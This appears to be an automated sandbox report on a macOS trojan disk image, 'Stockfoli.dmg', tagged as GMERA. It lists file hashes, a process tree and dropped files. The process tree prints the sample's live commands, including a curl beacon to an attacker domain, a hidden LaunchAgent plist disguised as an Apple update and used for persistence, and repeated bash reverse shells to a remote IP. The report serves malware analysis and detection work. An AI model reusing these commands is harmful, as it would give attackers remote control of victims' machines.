Analysis

  • max time network
    159s
  • platform
    macos_amd64
  • resource
    macos
  • submitted
    24-06-2021 12:53

General

  • Target

    Stockfoli.dmg

  • Size

    11.2MB

  • MD5

    22a526c0658e542f24358178fb079c38

  • SHA1

    352985598e83b42e99dfcb19636227335a18f8c0

  • SHA256

    118ba3642fdff254e37aee1ff9552fe189f7b1f8d5302d51c5010335acce6c2c

  • SHA512

    73c37880c044235028708e81d840120e78951a5ab4c100338ee958bce2409890a3c9dee75eab95dd8e37e98bd73c4561ff7a3413669527fa5ef458cce26971af

Score
10/10

Malware Config

Signatures

  • GMERA

    GMERA family.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

Processes

  • /bin/sh
    sh -c "sudo open /Volumes/Stockfoli/Stockfoli.app"
    1⤵
      PID:539
    • /bin/bash
      sh -c "sudo open /Volumes/Stockfoli/Stockfoli.app"
      1⤵
        PID:539
      • /usr/bin/sudo
        sudo open /Volumes/Stockfoli/Stockfoli.app
        1⤵
          PID:539
          • /usr/bin/open
            open /Volumes/Stockfoli/Stockfoli.app
            2⤵
              PID:540
          • /Volumes/Stockfoli/Stockfoli.app/Contents/MacOS/Stockfoli
            /Volumes/Stockfoli/Stockfoli.app/Contents/MacOS/Stockfoli
            1⤵
              PID:541
            • /bin/bash
              /bin/bash -c "nohup sh '/Volumes/Stockfoli/Stockfoli.app/Contents/Resources/run.sh' </dev/null >/dev/null 2>&1 &"
              1⤵
                PID:550
                • /usr/bin/nohup
                  nohup sh /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/run.sh
                  2⤵
                    PID:551
                  • /usr/bin/sh
                    sh /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/run.sh
                    2⤵
                      PID:551
                    • /bin/sh
                      sh /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/run.sh
                      2⤵
                        PID:551
                      • /bin/bash
                        sh /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/run.sh
                        2⤵
                          PID:551
                          • /usr/bin/curl
                            curl -ks "http://owpqkszz.info/link.php?run&185.220.101.144"
                            3⤵
                              PID:573
                            • /usr/bin/base64
                              base64 --decode
                              3⤵
                                PID:575
                              • /bin/cat
                                cat /tmp/.com.apple.upd.plist
                                3⤵
                                  PID:576
                                • /bin/cp
                                  cp /tmp/.com.apple.upd.plist /Users/run/Library/LaunchAgents/.com.apple.upd.plist
                                  3⤵
                                    PID:577
                                  • /bin/cat
                                    cat /Users/run/Library/LaunchAgents/.com.apple.upd.plist
                                    3⤵
                                      PID:578
                                    • /bin/launchctl
                                      launchctl load /tmp/.com.apple.upd.plist
                                      3⤵
                                        PID:579
                                      • /usr/bin/screen
                                        screen -d -m bash -c "bash -i >/dev/tcp/193.37.212.176/25733 0>&1"
                                        3⤵
                                          PID:584
                                    • /usr/bin/whoami
                                      whoami
                                      1⤵
                                        PID:554
                                      • /usr/bin/tr
                                        tr -dc "[:alnum:].\\r"
                                        1⤵
                                          PID:556
                                        • /usr/bin/tr
                                          tr "[:upper:]" "[:lower:]"
                                          1⤵
                                            PID:557
                                          • /usr/bin/curl
                                            curl -s ipecho.net/plain
                                            1⤵
                                              PID:560
                                            • /bin/bash
                                              /bin/bash -c "nohup '/Volumes/Stockfoli/Stockfoli.app/Contents/Resources/Stockfolio.app/Contents/MacOS/Stockfolio' </dev/null >/dev/null 2>&1 &"
                                              1⤵
                                                PID:561
                                                • /usr/bin/nohup
                                                  nohup /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/Stockfolio.app/Contents/MacOS/Stockfolio
                                                  2⤵
                                                    PID:562
                                                  • /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/Stockfolio.app/Contents/MacOS/Stockfolio
                                                    /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/Stockfolio.app/Contents/MacOS/Stockfolio
                                                    2⤵
                                                      PID:562
                                                  • /bin/bash
                                                    /bin/bash -c "screen -d -m bash -c 'bash -i >/dev/tcp/193.37.212.176/25734 0>&1'"
                                                    1⤵
                                                      PID:563
                                                    • /usr/bin/screen
                                                      screen -d -m bash -c "bash -i >/dev/tcp/193.37.212.176/25734 0>&1"
                                                      1⤵
                                                        PID:563
                                                      • /usr/bin/login
                                                        login -pflq run /bin/bash -c "bash -i >/dev/tcp/193.37.212.176/25734 0>&1"
                                                        1⤵
                                                          PID:565
                                                          • /bin/bash
                                                            bash -c "bash -i >/dev/tcp/193.37.212.176/25734 0>&1"
                                                            2⤵
                                                              PID:568
                                                              • /bin/bash
                                                                bash -i
                                                                3⤵
                                                                  PID:569
                                                            • /bin/bash
                                                              /bin/bash -c "bash -i >/dev/tcp/193.37.212.176/25735 0>&1"
                                                              1⤵
                                                                PID:566
                                                                • /bin/bash
                                                                  bash -i
                                                                  2⤵
                                                                    PID:567
                                                                • /usr/bin/tr
                                                                  tr -dc "[:alnum:].\\r"
                                                                  1⤵
                                                                    PID:571
                                                                  • /usr/bin/tr
                                                                    tr "[:upper:]" "[:lower:]"
                                                                    1⤵
                                                                      PID:572
                                                                    • /bin/launchctl
                                                                      launchctl list
                                                                      1⤵
                                                                        PID:582
                                                                      • /usr/bin/grep
                                                                        grep upd
                                                                        1⤵
                                                                          PID:583
                                                                        • /usr/bin/login
                                                                          login -pflq run /bin/bash -c "bash -i >/dev/tcp/193.37.212.176/25733 0>&1"
                                                                          1⤵
                                                                            PID:589
                                                                            • /bin/bash
                                                                              bash -c "bash -i >/dev/tcp/193.37.212.176/25733 0>&1"
                                                                              2⤵
                                                                                PID:591
                                                                                • /bin/bash
                                                                                  bash -i
                                                                                  3⤵
                                                                                    PID:592
                                                                              • /bin/bash
                                                                                /bin/bash -c "screen -d -m bash -c 'bash -i >/dev/tcp/193.37.212.176/25736 0>&1'"
                                                                                1⤵
                                                                                  PID:615
                                                                                • /usr/bin/screen
                                                                                  screen -d -m bash -c "bash -i >/dev/tcp/193.37.212.176/25736 0>&1"
                                                                                  1⤵
                                                                                    PID:615
                                                                                  • /usr/bin/login
                                                                                    login -pflq run /bin/bash -c "bash -i >/dev/tcp/193.37.212.176/25736 0>&1"
                                                                                    1⤵
                                                                                      PID:617
                                                                                      • /bin/bash
                                                                                        bash -c "bash -i >/dev/tcp/193.37.212.176/25736 0>&1"
                                                                                        2⤵
                                                                                          PID:618
                                                                                          • /bin/bash
                                                                                            bash -i
                                                                                            3⤵
                                                                                              PID:619

                                                                                        Network

                                                                                        MITRE ATT&CK Matrix

                                                                                        Replay Monitor

                                                                                        Loading Replay Monitor...

                                                                                        Downloads

                                                                                        • /Users/run/Library/LaunchAgents/.com.apple.upd.plist

                                                                                          MD5

                                                                                          d1ec6e05e4d46e06768d1e57bbe4a0e1

                                                                                          SHA1

                                                                                          ee6e20dcf2682bdf84d0614287c8053cc71fd744

                                                                                          SHA256

                                                                                          be8b6549da925f285307b17c616a010a9418af70d090ed960ade575ce27c7787

                                                                                          SHA512

                                                                                          a8903122038bd063d6094a234167e008840dfbdee4d16342c534c623d5642ab9a6a3ebf7138f462909d32ea2c01c3ea7c045ba6aa9e06a551b4a0754c3f2742b

                                                                                        • /Users/run/Library/LaunchAgents/.com.apple.upd.plist

                                                                                          MD5

                                                                                          d1ec6e05e4d46e06768d1e57bbe4a0e1

                                                                                          SHA1

                                                                                          ee6e20dcf2682bdf84d0614287c8053cc71fd744

                                                                                          SHA256

                                                                                          be8b6549da925f285307b17c616a010a9418af70d090ed960ade575ce27c7787

                                                                                          SHA512

                                                                                          a8903122038bd063d6094a234167e008840dfbdee4d16342c534c623d5642ab9a6a3ebf7138f462909d32ea2c01c3ea7c045ba6aa9e06a551b4a0754c3f2742b

                                                                                        • /private/tmp/.com.apple.upd.plist

                                                                                          MD5

                                                                                          d1ec6e05e4d46e06768d1e57bbe4a0e1

                                                                                          SHA1

                                                                                          ee6e20dcf2682bdf84d0614287c8053cc71fd744

                                                                                          SHA256

                                                                                          be8b6549da925f285307b17c616a010a9418af70d090ed960ade575ce27c7787

                                                                                          SHA512

                                                                                          a8903122038bd063d6094a234167e008840dfbdee4d16342c534c623d5642ab9a6a3ebf7138f462909d32ea2c01c3ea7c045ba6aa9e06a551b4a0754c3f2742b

                                                                                        • /private/tmp/.com.apple.upd.plist

                                                                                          MD5

                                                                                          d1ec6e05e4d46e06768d1e57bbe4a0e1

                                                                                          SHA1

                                                                                          ee6e20dcf2682bdf84d0614287c8053cc71fd744

                                                                                          SHA256

                                                                                          be8b6549da925f285307b17c616a010a9418af70d090ed960ade575ce27c7787

                                                                                          SHA512

                                                                                          a8903122038bd063d6094a234167e008840dfbdee4d16342c534c623d5642ab9a6a3ebf7138f462909d32ea2c01c3ea7c045ba6aa9e06a551b4a0754c3f2742b

                                                                                        • /private/tmp/loglog

                                                                                          MD5

                                                                                          ebb0a7faa9956546a1e4992db15c1f89

                                                                                          SHA1

                                                                                          9abe892e93d3605337dc84ba8f7573899b0585e5

                                                                                          SHA256

                                                                                          411eb63035d57f9bb853e0327a91f2ad6ae556acd188080a30c45554f4f3b402

                                                                                          SHA512

                                                                                          7303bf0471741cf275f0549903b8d6bd63df61ff9e83724ba15ca5f35f0902ac92e9d1b5e485bc29a765d58309b146a12af77eb9f66e4b1a5d729a58fc4db1eb

                                                                                        • /private/tmp/loglog

                                                                                          MD5

                                                                                          1a2c1acc6fc4f2300a663be1f037a8d3

                                                                                          SHA1

                                                                                          ea7570da86c520cfde9ca1ae37c3a538948ad324

                                                                                          SHA256

                                                                                          f9ae2bfd1327a91fd3702a2ea67cb268a26828f67c40bd440e95df83412566ab

                                                                                          SHA512

                                                                                          d698402262f96f375641b1d4d3e8decb1b62b71b3c93484c9a50c1f25d637408fc0a5a23a79eb44cf1674a493ebf0f5a827079ab48a615e41994b84fbbeffd1d

                                                                                        • /private/tmp/loglog

                                                                                          MD5

                                                                                          3f7e6c6f205752cb986504166b1b3037

                                                                                          SHA1

                                                                                          d3e6925bf8f0da26725effa98caf7d54876111fb

                                                                                          SHA256

                                                                                          bb635b4827e77b2037a16333da358af85ff62905a44b27b8cee63b67a1b26259

                                                                                          SHA512

                                                                                          73d59adba3fcd4f60cb92aa53d1d4b2978a319bf90663aeb99652900b1bae62b473d54d91601cc1d1b976503b9b20018616c9b727232581a68a41daa4d2d55fd

                                                                                        • /private/tmp/loglog

                                                                                          MD5

                                                                                          f4ebc88a7d81289168033c588c03c2a5

                                                                                          SHA1

                                                                                          dd3f91fb830a70c6f1cc1f41cd25d1ad2e9470dc

                                                                                          SHA256

                                                                                          16cf58feb19a0877dc7e248042012d40cb036df8638ec29da7defe5457c64459

                                                                                          SHA512

                                                                                          f5e709b27ecd7f48e9b54710ae93313e3587f9fe8c8eef3a9ea2e1f63e9cb2c69820734bcd418a572996d823b173e79739b20c37bbf998fd0d5243b180ab95c9

                                                                                        • /private/tmp/loglog

                                                                                          MD5

                                                                                          c17888dc849760d8b3a0f9a9e7bf2d77

                                                                                          SHA1

                                                                                          9dde4a42c8a59a5f1798dceb6e09c8e61094b504

                                                                                          SHA256

                                                                                          d1dd27a95370338a0e79c7c25189d551a0c2c1a4bb25f7bad99e38406c8a72f1

                                                                                          SHA512

                                                                                          7432f19f04728afb2dd192ce00fce477bda2a1687feee8be9299d66b7cd58023837dafa06d45dd9598ff63ccd8bb275e7539d89e6fb3ddf7cd69dbec9abf9143

                                                                                        • /private/tmp/loglog

                                                                                          MD5

                                                                                          42736086060db6e7fc1f3a69eded83db

                                                                                          SHA1

                                                                                          3d6e08dbb4a92335369e2a40f1586a8154db7233

                                                                                          SHA256

                                                                                          50e9da2d41889df1f86dd9fef667c4ff836e9b640789817ee813b6b7a6ed7e4a

                                                                                          SHA512

                                                                                          c69b8e40ef6d806a23ca6d8bb94aa033f19f710e48761bf7ce1e1f5a729c5c495358b09a4bbf802c1040304acec9b899d83f79ecc12e9ef019b0e2ce5259c129